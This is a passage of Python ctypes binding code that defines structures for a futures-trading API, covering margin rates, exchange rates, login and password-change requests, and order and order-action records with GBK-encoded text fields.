        ("LongMarginRatioByMoney", c_double),
        ("LongMarginRatioByVolume", c_double),
        ("ShortMarginRatioByMoney", c_double),
        ("ShortMarginRatioByVolume", c_double),
        ("ExchangeID", c_char_Array_9),
    ]
    def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, ExchangeID=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
            ("ExchangeID", ExchangeID),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("LongMarginRatioByMoney", LongMarginRatioByMoney),
            ("LongMarginRatioByVolume", LongMarginRatioByVolume),
            ("ShortMarginRatioByMoney", ShortMarginRatioByMoney),
            ("ShortMarginRatioByVolume", ShortMarginRatioByVolume),
        ):
            if value:
                setattr(self, name, value)
class ExchangeMarginRateAdjust(Struct):
    """Exchange margin-rate adjustment record. Fields are assigned only for
    truthy arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
        ("LongMarginRatioByMoney", c_double),
        ("LongMarginRatioByVolume", c_double),
        ("ShortMarginRatioByMoney", c_double),
        ("ShortMarginRatioByVolume", c_double),
        ("ExchLongMarginRatioByMoney", c_double),
        ("ExchLongMarginRatioByVolume", c_double),
        ("ExchShortMarginRatioByMoney", c_double),
        ("ExchShortMarginRatioByVolume", c_double),
        ("NoLongMarginRatioByMoney", c_double),
        ("NoLongMarginRatioByVolume", c_double),
        ("NoShortMarginRatioByMoney", c_double),
        ("NoShortMarginRatioByVolume", c_double),
    ]
    def __init__(self, BrokerID=None, InstrumentID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, ExchLongMarginRatioByMoney=None, ExchLongMarginRatioByVolume=None, ExchShortMarginRatioByMoney=None, ExchShortMarginRatioByVolume=None, NoLongMarginRatioByMoney=None, NoLongMarginRatioByVolume=None, NoShortMarginRatioByMoney=None, NoShortMarginRatioByVolume=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("InstrumentID", InstrumentID),
            ("HedgeFlag", HedgeFlag),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric ratio fields, stored verbatim.
        for name, value in (
            ("LongMarginRatioByMoney", LongMarginRatioByMoney),
            ("LongMarginRatioByVolume", LongMarginRatioByVolume),
            ("ShortMarginRatioByMoney", ShortMarginRatioByMoney),
            ("ShortMarginRatioByVolume", ShortMarginRatioByVolume),
            ("ExchLongMarginRatioByMoney", ExchLongMarginRatioByMoney),
            ("ExchLongMarginRatioByVolume", ExchLongMarginRatioByVolume),
            ("ExchShortMarginRatioByMoney", ExchShortMarginRatioByMoney),
            ("ExchShortMarginRatioByVolume", ExchShortMarginRatioByVolume),
            ("NoLongMarginRatioByMoney", NoLongMarginRatioByMoney),
            ("NoLongMarginRatioByVolume", NoLongMarginRatioByVolume),
            ("NoShortMarginRatioByMoney", NoShortMarginRatioByMoney),
            ("NoShortMarginRatioByVolume", NoShortMarginRatioByVolume),
        ):
            if value:
                setattr(self, name, value)
class ExchangeRate(Struct):
    """Currency exchange-rate record. Fields are assigned only for truthy
    arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("FromCurrencyID", c_char_Array_4),
        ("FromCurrencyUnit", c_double),
        ("ToCurrencyID", c_char_Array_4),
        ("ExchangeRate", c_double),
    ]
    def __init__(self, BrokerID=None, FromCurrencyID=None, FromCurrencyUnit=None, ToCurrencyID=None, ExchangeRate=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("FromCurrencyID", FromCurrencyID),
            ("ToCurrencyID", ToCurrencyID),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (("FromCurrencyUnit", FromCurrencyUnit), ("ExchangeRate", ExchangeRate)):
            if value:
                setattr(self, name, value)
class SettlementRef(Struct):
    """Settlement reference key (trading day + settlement id). Fields are
    assigned only for truthy arguments; text is stored GBK-encoded."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
    ]
    def __init__(self, TradingDay=None, SettlementID=None):
        super().__init__()
        for name, value in (("TradingDay", TradingDay),):
            if value:
                setattr(self, name, value.encode("GBK"))
        for name, value in (("SettlementID", SettlementID),):
            if value:
                setattr(self, name, value)
class CurrentTime(Struct):
    """Current date/time snapshot. Fields are assigned only for truthy
    arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("CurrDate", c_char_Array_9),
        ("CurrTime", c_char_Array_9),
        ("CurrMillisec", c_int),
        ("ActionDay", c_char_Array_9),
    ]
    def __init__(self, CurrDate=None, CurrTime=None, CurrMillisec=None, ActionDay=None):
        super().__init__()
        for name, value in (
            ("CurrDate", CurrDate),
            ("CurrTime", CurrTime),
            ("ActionDay", ActionDay),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        if CurrMillisec:
            self.CurrMillisec = CurrMillisec
class CommPhase(Struct):
    """Communication phase record. Fields are assigned only for truthy
    arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("CommPhaseNo", c_short),
        ("SystemID", c_char_Array_21),
    ]
    def __init__(self, TradingDay=None, CommPhaseNo=None, SystemID=None):
        super().__init__()
        for name, value in (("TradingDay", TradingDay), ("SystemID", SystemID)):
            if value:
                setattr(self, name, value.encode("GBK"))
        if CommPhaseNo:
            self.CommPhaseNo = CommPhaseNo
class LoginInfo(Struct):
    """Session login information. Fields are assigned only for truthy
    arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("LoginDate", c_char_Array_9),
        ("LoginTime", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("UserProductInfo", c_char_Array_11),
        ("InterfaceProductInfo", c_char_Array_11),
        ("ProtocolInfo", c_char_Array_11),
        ("SystemName", c_char_Array_41),
        ("PasswordDeprecated", c_char_Array_41),
        ("MaxOrderRef", c_char_Array_13),
        ("SHFETime", c_char_Array_9),
        ("DCETime", c_char_Array_9),
        ("CZCETime", c_char_Array_9),
        ("FFEXTime", c_char_Array_9),
        ("MacAddress", c_char_Array_21),
        ("OneTimePassword", c_char_Array_41),
        ("INETime", c_char_Array_9),
        ("IsQryControl", c_int),
        ("LoginRemark", c_char_Array_36),
        ("Password", c_char_Array_41),
    ]
    def __init__(self, FrontID=None, SessionID=None, BrokerID=None, UserID=None, LoginDate=None, LoginTime=None, IPAddress=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, SystemName=None, PasswordDeprecated=None, MaxOrderRef=None, SHFETime=None, DCETime=None, CZCETime=None, FFEXTime=None, MacAddress=None, OneTimePassword=None, INETime=None, IsQryControl=None, LoginRemark=None, Password=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("LoginDate", LoginDate),
            ("LoginTime", LoginTime),
            ("IPAddress", IPAddress),
            ("UserProductInfo", UserProductInfo),
            ("InterfaceProductInfo", InterfaceProductInfo),
            ("ProtocolInfo", ProtocolInfo),
            ("SystemName", SystemName),
            ("PasswordDeprecated", PasswordDeprecated),
            ("MaxOrderRef", MaxOrderRef),
            ("SHFETime", SHFETime),
            ("DCETime", DCETime),
            ("CZCETime", CZCETime),
            ("FFEXTime", FFEXTime),
            ("MacAddress", MacAddress),
            ("OneTimePassword", OneTimePassword),
            ("INETime", INETime),
            ("LoginRemark", LoginRemark),
            ("Password", Password),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("IsQryControl", IsQryControl),
        ):
            if value:
                setattr(self, name, value)
class LogoutAll(Struct):
    """Logout-all request for a front/session. Fields are assigned only for
    truthy arguments; text is stored GBK-encoded."""
    _fields_ = [
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("SystemName", c_char_Array_41),
    ]
    def __init__(self, FrontID=None, SessionID=None, SystemName=None):
        super().__init__()
        for name, value in (("FrontID", FrontID), ("SessionID", SessionID)):
            if value:
                setattr(self, name, value)
        if SystemName:
            self.SystemName = SystemName.encode("GBK")
class FrontStatus(Struct):
    """Front-machine status record. Fields are assigned only for truthy
    arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("FrontID", c_int),
        ("LastReportDate", c_char_Array_9),
        ("LastReportTime", c_char_Array_9),
        ("IsActive", c_int),
    ]
    def __init__(self, FrontID=None, LastReportDate=None, LastReportTime=None, IsActive=None):
        super().__init__()
        for name, value in (("LastReportDate", LastReportDate), ("LastReportTime", LastReportTime)):
            if value:
                setattr(self, name, value.encode("GBK"))
        for name, value in (("FrontID", FrontID), ("IsActive", IsActive)):
            if value:
                setattr(self, name, value)
class UserPasswordUpdate(Struct):
    """User password change request. Fields are assigned only for truthy
    arguments and stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("OldPassword", c_char_Array_41),
        ("NewPassword", c_char_Array_41),
    ]
    def __init__(self, BrokerID=None, UserID=None, OldPassword=None, NewPassword=None):
        super().__init__()
        for name, value in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("OldPassword", OldPassword),
            ("NewPassword", NewPassword),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
class InputOrder(Struct):
    """Order-insert request. Fields are assigned only for truthy arguments;
    text arguments are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("OrderPriceType", c_char),
        ("Direction", c_char),
        ("CombOffsetFlag", c_char_Array_5),
        ("CombHedgeFlag", c_char_Array_5),
        ("LimitPrice", c_double),
        ("VolumeTotalOriginal", c_int),
        ("TimeCondition", c_char),
        ("GTDDate", c_char_Array_9),
        ("VolumeCondition", c_char),
        ("MinVolume", c_int),
        ("ContingentCondition", c_char),
        ("StopPrice", c_double),
        ("ForceCloseReason", c_char),
        ("IsAutoSuspend", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("RequestID", c_int),
        ("UserForceClose", c_int),
        ("IsSwapOrder", c_int),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("ClientID", c_char_Array_11),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, UserForceClose=None, IsSwapOrder=None, ExchangeID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, ClientID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("OrderRef", OrderRef),
            ("UserID", UserID),
            ("OrderPriceType", OrderPriceType),
            ("Direction", Direction),
            ("CombOffsetFlag", CombOffsetFlag),
            ("CombHedgeFlag", CombHedgeFlag),
            ("TimeCondition", TimeCondition),
            ("GTDDate", GTDDate),
            ("VolumeCondition", VolumeCondition),
            ("ContingentCondition", ContingentCondition),
            ("ForceCloseReason", ForceCloseReason),
            ("BusinessUnit", BusinessUnit),
            ("ExchangeID", ExchangeID),
            ("InvestUnitID", InvestUnitID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
            ("ClientID", ClientID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("LimitPrice", LimitPrice),
            ("VolumeTotalOriginal", VolumeTotalOriginal),
            ("MinVolume", MinVolume),
            ("StopPrice", StopPrice),
            ("IsAutoSuspend", IsAutoSuspend),
            ("RequestID", RequestID),
            ("UserForceClose", UserForceClose),
            ("IsSwapOrder", IsSwapOrder),
        ):
            if value:
                setattr(self, name, value)
class Order(Struct):
    """Full order record as reported back by the system. Fields are assigned
    only for truthy arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("InstrumentID", c_char_Array_31),
        ("OrderRef", c_char_Array_13),
        ("UserID", c_char_Array_16),
        ("OrderPriceType", c_char),
        ("Direction", c_char),
        ("CombOffsetFlag", c_char_Array_5),
        ("CombHedgeFlag", c_char_Array_5),
        ("LimitPrice", c_double),
        ("VolumeTotalOriginal", c_int),
        ("TimeCondition", c_char),
        ("GTDDate", c_char_Array_9),
        ("VolumeCondition", c_char),
        ("MinVolume", c_int),
        ("ContingentCondition", c_char),
        ("StopPrice", c_double),
        ("ForceCloseReason", c_char),
        ("IsAutoSuspend", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("RequestID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderSubmitStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("OrderSysID", c_char_Array_21),
        ("OrderSource", c_char),
        ("OrderStatus", c_char),
        ("OrderType", c_char),
        ("VolumeTraded", c_int),
        ("VolumeTotal", c_int),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("ActiveTime", c_char_Array_9),
        ("SuspendTime", c_char_Array_9),
        ("UpdateTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("ActiveTraderID", c_char_Array_21),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("UserProductInfo", c_char_Array_11),
        ("StatusMsg", c_char_Array_81),
        ("UserForceClose", c_int),
        ("ActiveUserID", c_char_Array_16),
        ("BrokerOrderSeq", c_int),
        ("RelativeOrderSysID", c_char_Array_21),
        ("ZCETotalTradedVolume", c_int),
        ("IsSwapOrder", c_int),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OrderRef=None, UserID=None, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, OrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OrderSysID=None, OrderSource=None, OrderStatus=None, OrderType=None, VolumeTraded=None, VolumeTotal=None, InsertDate=None, InsertTime=None, ActiveTime=None, SuspendTime=None, UpdateTime=None, CancelTime=None, ActiveTraderID=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, UserForceClose=None, ActiveUserID=None, BrokerOrderSeq=None, RelativeOrderSysID=None, ZCETotalTradedVolume=None, IsSwapOrder=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("InstrumentID", InstrumentID),
            ("OrderRef", OrderRef),
            ("UserID", UserID),
            ("OrderPriceType", OrderPriceType),
            ("Direction", Direction),
            ("CombOffsetFlag", CombOffsetFlag),
            ("CombHedgeFlag", CombHedgeFlag),
            ("TimeCondition", TimeCondition),
            ("GTDDate", GTDDate),
            ("VolumeCondition", VolumeCondition),
            ("ContingentCondition", ContingentCondition),
            ("ForceCloseReason", ForceCloseReason),
            ("BusinessUnit", BusinessUnit),
            ("OrderLocalID", OrderLocalID),
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("TraderID", TraderID),
            ("OrderSubmitStatus", OrderSubmitStatus),
            ("TradingDay", TradingDay),
            ("OrderSysID", OrderSysID),
            ("OrderSource", OrderSource),
            ("OrderStatus", OrderStatus),
            ("OrderType", OrderType),
            ("InsertDate", InsertDate),
            ("InsertTime", InsertTime),
            ("ActiveTime", ActiveTime),
            ("SuspendTime", SuspendTime),
            ("UpdateTime", UpdateTime),
            ("CancelTime", CancelTime),
            ("ActiveTraderID", ActiveTraderID),
            ("ClearingPartID", ClearingPartID),
            ("UserProductInfo", UserProductInfo),
            ("StatusMsg", StatusMsg),
            ("ActiveUserID", ActiveUserID),
            ("RelativeOrderSysID", RelativeOrderSysID),
            ("BranchID", BranchID),
            ("InvestUnitID", InvestUnitID),
            ("AccountID", AccountID),
            ("CurrencyID", CurrencyID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("LimitPrice", LimitPrice),
            ("VolumeTotalOriginal", VolumeTotalOriginal),
            ("MinVolume", MinVolume),
            ("StopPrice", StopPrice),
            ("IsAutoSuspend", IsAutoSuspend),
            ("RequestID", RequestID),
            ("InstallID", InstallID),
            ("NotifySequence", NotifySequence),
            ("SettlementID", SettlementID),
            ("VolumeTraded", VolumeTraded),
            ("VolumeTotal", VolumeTotal),
            ("SequenceNo", SequenceNo),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("UserForceClose", UserForceClose),
            ("BrokerOrderSeq", BrokerOrderSeq),
            ("ZCETotalTradedVolume", ZCETotalTradedVolume),
            ("IsSwapOrder", IsSwapOrder),
        ):
            if value:
                setattr(self, name, value)
class ExchangeOrder(Struct):
    """Exchange-side order record. Fields are assigned only for truthy
    arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("OrderPriceType", c_char),
        ("Direction", c_char),
        ("CombOffsetFlag", c_char_Array_5),
        ("CombHedgeFlag", c_char_Array_5),
        ("LimitPrice", c_double),
        ("VolumeTotalOriginal", c_int),
        ("TimeCondition", c_char),
        ("GTDDate", c_char_Array_9),
        ("VolumeCondition", c_char),
        ("MinVolume", c_int),
        ("ContingentCondition", c_char),
        ("StopPrice", c_double),
        ("ForceCloseReason", c_char),
        ("IsAutoSuspend", c_int),
        ("BusinessUnit", c_char_Array_21),
        ("RequestID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("ExchangeInstID", c_char_Array_31),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderSubmitStatus", c_char),
        ("NotifySequence", c_int),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("OrderSysID", c_char_Array_21),
        ("OrderSource", c_char),
        ("OrderStatus", c_char),
        ("OrderType", c_char),
        ("VolumeTraded", c_int),
        ("VolumeTotal", c_int),
        ("InsertDate", c_char_Array_9),
        ("InsertTime", c_char_Array_9),
        ("ActiveTime", c_char_Array_9),
        ("SuspendTime", c_char_Array_9),
        ("UpdateTime", c_char_Array_9),
        ("CancelTime", c_char_Array_9),
        ("ActiveTraderID", c_char_Array_21),
        ("ClearingPartID", c_char_Array_11),
        ("SequenceNo", c_int),
        ("BranchID", c_char_Array_9),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, OrderPriceType=None, Direction=None, CombOffsetFlag=None, CombHedgeFlag=None, LimitPrice=None, VolumeTotalOriginal=None, TimeCondition=None, GTDDate=None, VolumeCondition=None, MinVolume=None, ContingentCondition=None, StopPrice=None, ForceCloseReason=None, IsAutoSuspend=None, BusinessUnit=None, RequestID=None, OrderLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OrderSysID=None, OrderSource=None, OrderStatus=None, OrderType=None, VolumeTraded=None, VolumeTotal=None, InsertDate=None, InsertTime=None, ActiveTime=None, SuspendTime=None, UpdateTime=None, CancelTime=None, ActiveTraderID=None, ClearingPartID=None, SequenceNo=None, BranchID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("OrderPriceType", OrderPriceType),
            ("Direction", Direction),
            ("CombOffsetFlag", CombOffsetFlag),
            ("CombHedgeFlag", CombHedgeFlag),
            ("TimeCondition", TimeCondition),
            ("GTDDate", GTDDate),
            ("VolumeCondition", VolumeCondition),
            ("ContingentCondition", ContingentCondition),
            ("ForceCloseReason", ForceCloseReason),
            ("BusinessUnit", BusinessUnit),
            ("OrderLocalID", OrderLocalID),
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("ExchangeInstID", ExchangeInstID),
            ("TraderID", TraderID),
            ("OrderSubmitStatus", OrderSubmitStatus),
            ("TradingDay", TradingDay),
            ("OrderSysID", OrderSysID),
            ("OrderSource", OrderSource),
            ("OrderStatus", OrderStatus),
            ("OrderType", OrderType),
            ("InsertDate", InsertDate),
            ("InsertTime", InsertTime),
            ("ActiveTime", ActiveTime),
            ("SuspendTime", SuspendTime),
            ("UpdateTime", UpdateTime),
            ("CancelTime", CancelTime),
            ("ActiveTraderID", ActiveTraderID),
            ("ClearingPartID", ClearingPartID),
            ("BranchID", BranchID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("LimitPrice", LimitPrice),
            ("VolumeTotalOriginal", VolumeTotalOriginal),
            ("MinVolume", MinVolume),
            ("StopPrice", StopPrice),
            ("IsAutoSuspend", IsAutoSuspend),
            ("RequestID", RequestID),
            ("InstallID", InstallID),
            ("NotifySequence", NotifySequence),
            ("SettlementID", SettlementID),
            ("VolumeTraded", VolumeTraded),
            ("VolumeTotal", VolumeTotal),
            ("SequenceNo", SequenceNo),
        ):
            if value:
                setattr(self, name, value)
class ExchangeOrderInsertError(Struct):
    """Exchange order-insert error report. Fields are assigned only for
    truthy arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ErrorID", c_int),
        ("ErrorMsg", c_char_Array_81),
    ]
    def __init__(self, ExchangeID=None, ParticipantID=None, TraderID=None, InstallID=None, OrderLocalID=None, ErrorID=None, ErrorMsg=None):
        super().__init__()
        for name, value in (
            ("ExchangeID", ExchangeID),
            ("ParticipantID", ParticipantID),
            ("TraderID", TraderID),
            ("OrderLocalID", OrderLocalID),
            ("ErrorMsg", ErrorMsg),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        for name, value in (("InstallID", InstallID), ("ErrorID", ErrorID)):
            if value:
                setattr(self, name, value)
class InputOrderAction(Struct):
    """Order action (e.g. cancel/modify) request. Fields are assigned only
    for truthy arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OrderActionRef", c_int),
        ("OrderRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("LimitPrice", c_double),
        ("VolumeChange", c_int),
        ("UserID", c_char_Array_16),
        ("InstrumentID", c_char_Array_31),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, UserID=None, InstrumentID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("OrderRef", OrderRef),
            ("ExchangeID", ExchangeID),
            ("OrderSysID", OrderSysID),
            ("ActionFlag", ActionFlag),
            ("UserID", UserID),
            ("InstrumentID", InstrumentID),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("OrderActionRef", OrderActionRef),
            ("RequestID", RequestID),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("LimitPrice", LimitPrice),
            ("VolumeChange", VolumeChange),
        ):
            if value:
                setattr(self, name, value)
class OrderAction(Struct):
    """Order action record with execution status. Fields are assigned only
    for truthy arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OrderActionRef", c_int),
        ("OrderRef", c_char_Array_13),
        ("RequestID", c_int),
        ("FrontID", c_int),
        ("SessionID", c_int),
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("LimitPrice", c_double),
        ("VolumeChange", c_int),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("StatusMsg", c_char_Array_81),
        ("InstrumentID", c_char_Array_31),
        ("BranchID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
        ("IPAddress", c_char_Array_16),
        ("MacAddress", c_char_Array_21),
    ]
    def __init__(self, BrokerID=None, InvestorID=None, OrderActionRef=None, OrderRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OrderSysID=None, ActionFlag=None, LimitPrice=None, VolumeChange=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OrderLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
        super().__init__()
        # GBK-encoded text fields.
        for name, value in (
            ("BrokerID", BrokerID),
            ("InvestorID", InvestorID),
            ("OrderRef", OrderRef),
            ("ExchangeID", ExchangeID),
            ("OrderSysID", OrderSysID),
            ("ActionFlag", ActionFlag),
            ("ActionDate", ActionDate),
            ("ActionTime", ActionTime),
            ("TraderID", TraderID),
            ("OrderLocalID", OrderLocalID),
            ("ActionLocalID", ActionLocalID),
            ("ParticipantID", ParticipantID),
            ("ClientID", ClientID),
            ("BusinessUnit", BusinessUnit),
            ("OrderActionStatus", OrderActionStatus),
            ("UserID", UserID),
            ("StatusMsg", StatusMsg),
            ("InstrumentID", InstrumentID),
            ("BranchID", BranchID),
            ("InvestUnitID", InvestUnitID),
            ("IPAddress", IPAddress),
            ("MacAddress", MacAddress),
        ):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields, stored verbatim.
        for name, value in (
            ("OrderActionRef", OrderActionRef),
            ("RequestID", RequestID),
            ("FrontID", FrontID),
            ("SessionID", SessionID),
            ("LimitPrice", LimitPrice),
            ("VolumeChange", VolumeChange),
            ("InstallID", InstallID),
        ):
            if value:
                setattr(self, name, value)
class ExchangeOrderAction(Struct):
    """Exchange-side order action record. Fields are assigned only for
    truthy arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("OrderSysID", c_char_Array_21),
        ("ActionFlag", c_char),
        ("LimitPrice", c_double),
        ("VolumeChange", c_int),
        ("ActionDate", c_char_Array_9),
        ("ActionTime", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("InstallID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("ActionLocalID", c_char_Array_13),
        ("ParticipantID", c_char_Array_11),
        ("ClientID", c_char_Array_11),
        ("BusinessUnit", c_char_Array_21),
        ("OrderActionStatus", c_char),
        ("UserID", c_char_Array_16),
        ("BranchID", c_char_Array_9),
